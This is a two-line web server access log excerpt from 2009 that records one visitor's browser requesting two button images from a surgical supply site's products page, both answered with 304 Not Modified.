88.241.136.141 - - [10/Jul/2009:05:26:59 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
88.241.136.141 - - [10/Jul/2009:05:26:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
